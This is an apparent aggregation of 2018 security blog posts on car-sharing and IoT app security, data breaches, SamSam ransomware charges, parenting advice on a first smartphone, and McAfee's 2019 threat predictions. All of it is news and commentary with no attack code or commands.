There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.

First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?

first smartphone

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

first smartphone

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding first smartphoneone’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.

 

 

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

Brazilian Financial Malware Spreads Beyond National Boundaries

Brazilian Actors Expand Financial Malware Campaigns to Attack Spanish-Speaking Countries

A detailed analysis from security researchers shows how Brazilian financial malware is spreading beyond national boundaries to attack banks in Spanish-speaking countries through South and Latin America, and Portugal and Spain in Europe. 

read more

U.S. DoJ charges Iranian duo over SamSam Ransomware activity

The U.S. DoJ charges two Iranian men over their alleged role in creating and spreading the infamous SamSam ransomware.

Two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27) have been charged by DoJ for their role in creating and distributing the dreaded SamSam ransomware.

The duo faces six hacking and extortion-related charges, including conspiracy to commit wire fraud, intentional damage to a protected computer, conspiracy to commit fraud and related activity in connection with computers,  and transmitting a demand in relation to damaging a protected computer.

The two Iranians are accused to have developed the SamSam ransomware in December 2015 and have continuously improved it.

“Extorted the Victims for ransom payments in exchange for the decryption keys to unlock the compromised computers.” reads the DoJ indictment. 

“The defendants hacked, encrypted, and extorted more than 200 Victims, and collected more than $6 million in ransom payments. The Victims incurred additional losses exceeding $30 million resulting from the loss of access to their data.”

The hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals, they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by ransomware, the cyber attack was confirmed by the City officials.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the port of San Diego in September,  the incident impacted the processing park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), the DOT has shut down the infected workstations.

In August, Sophos security firm published a report the SamSam ransomware, its experts tracked Bitcoin addresses managed by the crime gang and discovered that crooks had extorted nearly $6 million from the victims since December 2015 when it appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015.
74% of the known victims are based in the United States. Other regions known to have
suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a
significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million, the security firm also estimated that the group is netting around $300,000 per month.

Prosecutors reported that Savandi and Mansouri used Iranian Bitcoin exchanges to exchange the cryptocurrency into Iranian rial.

The crooks used the Tor network to avoid being tracked, exports noticed that also encrypted data backups to prevent victims from recovering their encrypted files.

Authorities inserted the two Iranians in the FBI’s Cyber Most Wanted list.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, Iranian hackers)

The post U.S. DoJ charges Iranian duo over SamSam Ransomware activity appeared first on Security Affairs.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

Cybercrime: There Is No End in Sight

Whoever said “crime doesn’t pay” hasn’t been following the growth of cybercrime across the globe. A thriving underground economy has evolved over the past decade to become a massive industry. Estimates in the Web of Profit research paper show cybercriminal revenues worldwide of at least $1.5 trillion – equal to the GDP of Russia. If […]… Read More

The post Cybercrime: There Is No End in Sight appeared first on The State of Security.

ESTA registration websites still lurk in paid ads on Google

Google has taken direct action against adverts promoting ESTA registration services, often offered by third parties at highly inflated prices. Ads displayed on the Google network shouldn’t display fees higher than what a public source or government charges for products or services. This tightening of the ad leash has taken a remarkable eight years to complete—and we argue it’s not done yet.

What ESTA services are these sites advertising?

The US Visa Waiver program allows citizens of 38 countries to travel visa free for up to 90 days. This requires an application for eligibility on ESTA (Electronic System for Travel Authorisation). The process is simple and takes only around 10 minutes to fill in an application online. However, many sites have sprung up offering to fill it in on your behalf.

That sounds great!

